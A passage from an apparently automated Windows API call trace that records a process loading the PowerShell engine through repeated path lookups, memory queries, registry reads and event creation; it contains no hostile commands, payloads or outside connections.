0x74 [0027.391] GetLastError () returned 0xcb [0027.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.391] GetLastError () returned 0xcb [0027.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd734, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.412] GetLastError () returned 0xcb [0027.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.412] GetLastError () returned 0xcb [0027.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.412] GetLastError () returned 0xcb [0027.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd734, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.412] GetLastError () returned 0xcb [0027.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.412] GetLastError () returned 0xcb [0027.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.412] GetLastError () returned 0xcb [0027.412] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.413] GetLastError () returned 0xcb [0027.443] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.449] GetLastError () returned 0xcb [0027.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.450] GetLastError () returned 0xcb [0027.453] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.453] GetLastError () returned 0xcb [0027.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.555] GetLastError () returned 0xcb [0027.555] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.555] GetLastError () returned 0xcb [0027.556] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.557] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.594] GetLastError () returned 0xcb [0027.609] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.613] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.613] GetLastError () returned 0xcb [0027.845] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x2b43e0 [0027.845] GetLastError () returned 0x0 [0027.845] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x2b4468 [0027.845] GetLastError () returned 0x0 [0027.926] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.938] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.940] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.940] VirtualQuery (in: lpAddress=0x1cc314, lpBuffer=0x1cd314, dwLength=0x1c | out: lpBuffer=0x1cd314*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.965] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.966] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.966] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.966] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.966] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.966] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.966] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.966] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.966] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.966] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.966] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.966] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.966] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.967] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.967] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.967] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.967] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.967] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.967] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.967] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.967] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.967] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.967] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.967] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.967] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.967] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.968] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.968] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.968] VirtualQuery (in: lpAddress=0x1ccc60, lpBuffer=0x1cdc60, dwLength=0x1c | out: lpBuffer=0x1cdc60*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.970] GetLastError () returned 0xcb [0027.971] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.971] GetLastError () returned 0xcb [0027.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda5c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.971] GetLastError () returned 0xcb [0027.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.971] GetLastError () returned 0xcb [0027.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.971] GetLastError () returned 0xcb [0027.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cda0c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0027.971] GetLastError () returned 0xcb [0027.984] VirtualQuery (in: lpAddress=0x1ccf88, lpBuffer=0x1cdf88, dwLength=0x1c | out: lpBuffer=0x1cdf88*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.985] VirtualQuery (in: lpAddress=0x1ccf80, lpBuffer=0x1cdf80, dwLength=0x1c | out: lpBuffer=0x1cdf80*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.985] VirtualQuery (in: lpAddress=0x1ccc34, lpBuffer=0x1cdc34, dwLength=0x1c | out: lpBuffer=0x1cdc34*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.985] VirtualQuery (in: lpAddress=0x1ccc34, lpBuffer=0x1cdc34, dwLength=0x1c | out: lpBuffer=0x1cdc34*(BaseAddress=0x1cc000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.986] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce6bc | out: phkResult=0x1ce6bc*=0x374) returned 0x0 [0027.986] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce704, lpData=0x0, lpcbData=0x1ce700*=0x0 | out: lpType=0x1ce704*=0x1, lpData=0x0, lpcbData=0x1ce700*=0x56) returned 0x0 [0027.986] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce704, lpData=0x2b64c0, lpcbData=0x1ce700*=0x56 | out: lpType=0x1ce704*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ce700*=0x56) returned 0x0 [0027.987] RegCloseKey (hKey=0x374) returned 0x0 [0027.987] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce6bc | out: phkResult=0x1ce6bc*=0x374) returned 0x0 [0027.987] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce704, lpData=0x0, lpcbData=0x1ce700*=0x0 | out: lpType=0x1ce704*=0x1, lpData=0x0, lpcbData=0x1ce700*=0x56) returned 0x0 [0027.987] RegQueryValueExW (in: hKey=0x374, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce704, lpData=0x2b64c0, lpcbData=0x1ce700*=0x56 | out: lpType=0x1ce704*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ce700*=0x56) returned 0x0 [0027.987] RegCloseKey (hKey=0x374) returned 0x0 [0027.987] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2b64c0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\Documents") returned 0x0 [0027.987] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", nBufferLength=0x105, lpBuffer=0x1ce254, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", lpFilePart=0x0) returned 0x22 [0027.987] GetLastError () returned 0x3f0 [0027.987] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2b64c0 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\Documents") returned 0x0 [0027.987] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", nBufferLength=0x105, lpBuffer=0x1ce254, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Documents", lpFilePart=0x0) returned 0x22 [0027.987] GetLastError () returned 0x3f0 [0027.988] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.988] GetLastError () returned 0xcb [0027.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.990] GetLastError () returned 0xcb [0027.991] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.991] GetLastError () returned 0xcb [0027.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.992] GetLastError () returned 0xcb [0027.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.992] GetLastError () returned 0xcb [0027.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.992] GetLastError () returned 0xcb [0027.992] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x374 [0027.992] GetLastError () returned 0x0 [0027.992] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x378 [0027.992] GetLastError () returned 0x0 [0027.992] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x37c [0027.992] GetLastError () returned 0x0 [0027.992] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380 [0027.992] GetLastError () returned 0x0 [0027.992] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x384 [0027.993] GetLastError () returned 0x0 [0027.993] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3a0 [0027.993] GetLastError () returned 0x0 [0027.993] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c [0027.993] GetLastError () returned 0x0 [0027.993] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x38c [0027.993] GetLastError () returned 0x0 [0027.993] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x390 [0027.993] GetLastError () returned 0x0 [0027.993] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x2f8 [0027.993] GetLastError () returned 0x0 [0027.993] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2fc [0027.993] GetLastError () returned 0x0 [0027.993] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c [0027.993] GetLastError () returned 0x0 [0027.994] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0027.994] GetLastError () returned 0xcb [0027.997] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0027.997] GetLastError () returned 0xcb [0027.998] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1ce7ac | out: lpMode=0x1ce7ac) returned 1 [0027.998] GetLastError () returned 0xcb [0028.001] SetEvent (hEvent=0x380) returned 1 [0028.001] GetLastError () returned 0xcb [0028.001] SetEvent (hEvent=0x374) returned 1 [0028.001] GetLastError () returned 0xcb [0028.001] SetEvent (hEvent=0x378) returned 1 [0028.001] GetLastError () returned 0xcb [0028.001] SetEvent (hEvent=0x37c) returned 1 [0028.001] GetLastError () returned 0xcb [0028.001] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c [0028.001] GetLastError () returned 0x0 [0028.002] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0028.002] GetLastError () returned 0xcb [0028.003] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce610 | out: phkResult=0x1ce610*=0x330) returned 0x0 [0028.003] RegQueryValueExW (in: hKey=0x330, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1ce658, lpData=0x0, lpcbData=0x1ce654*=0x0 | out: lpType=0x1ce658*=0x0, lpData=0x0, lpcbData=0x1ce654*=0x0) returned 0x2 [0044.657] CoCreateGuid (in: pguid=0x1ce6b0 | out: pguid=0x1ce6b0*(Data1=0x520e2ca, Data2=0xe2a0, Data3=0x4a3d, Data4=([0]=0xb3, [1]=0x78, [2]=0x31, [3]=0x77, [4]=0xfa, [5]=0x18, [6]=0xb1, [7]=0x51))) returned 0x0 [0044.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce018, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.657] GetLastError () returned 0x0 [0044.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.657] GetLastError () returned 0x0 [0044.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cdfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.657] GetLastError () returned 0x0 [0044.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce018, lpFilePart=0x0 | out: 